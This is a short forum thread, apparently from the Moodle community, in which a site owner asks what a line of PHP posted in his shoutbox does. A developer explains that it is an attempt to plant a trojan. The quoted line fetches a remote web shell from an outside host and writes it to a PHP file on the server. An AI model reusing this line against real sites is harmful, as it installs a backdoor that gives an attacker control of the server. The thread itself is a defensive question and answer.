Some joker posted this in my shoutbox on my homepage. What's he trying to do???

Some joker posted this in my shoutbox on my homepage. What's he trying to do???

על ידי Frankie Kam בתאריך
מספר תגובות: 2
תמונה של Plugin developers

Here's the code:

<? $z=fopen("11.php",'w');fwrite($z,file_get_contents("http://t00ls.org/c99.txt"));fclose($z); ?> (Tuesday, 10.05.11, 03:47 AM)

 

What was he trying to accomplish?

 

Frankie Kam

ממוצע דרוגים: -
בתגובה ל: Frankie Kam

Re: Some joker posted this in my shoutbox on my homepage. What's he trying to do???

על ידי Tim Hunt בתאריך
תמונה של Core developers תמונה של Documentation writers תמונה של Particularly helpful Moodlers תמונה של Peer reviewers תמונה של Plugin developers

He is trying to download a trojan to you server, so that later he can go to the URL .../11.php to execute malicious stuff. However, that sort of thing will not work, providing you are no using a badly-implemented plugin that has security holes.

ממוצע דרוגים: -
בתגובה ל: Tim Hunt

Re: Some joker posted this in my shoutbox on my homepage. What's he trying to do???

על ידי Frankie Kam בתאריך
תמונה של Plugin developers

Thanks Tim

Now I know what his intentions are,

This time, I took evasive action. Since I don't know how to stop him from posting such code, I modified the php core code of the Shoutbox so that it will replace substring text with blanks. So fopen, is replaced for blanks, for example.

Frankie Kam

ממוצע דרוגים: -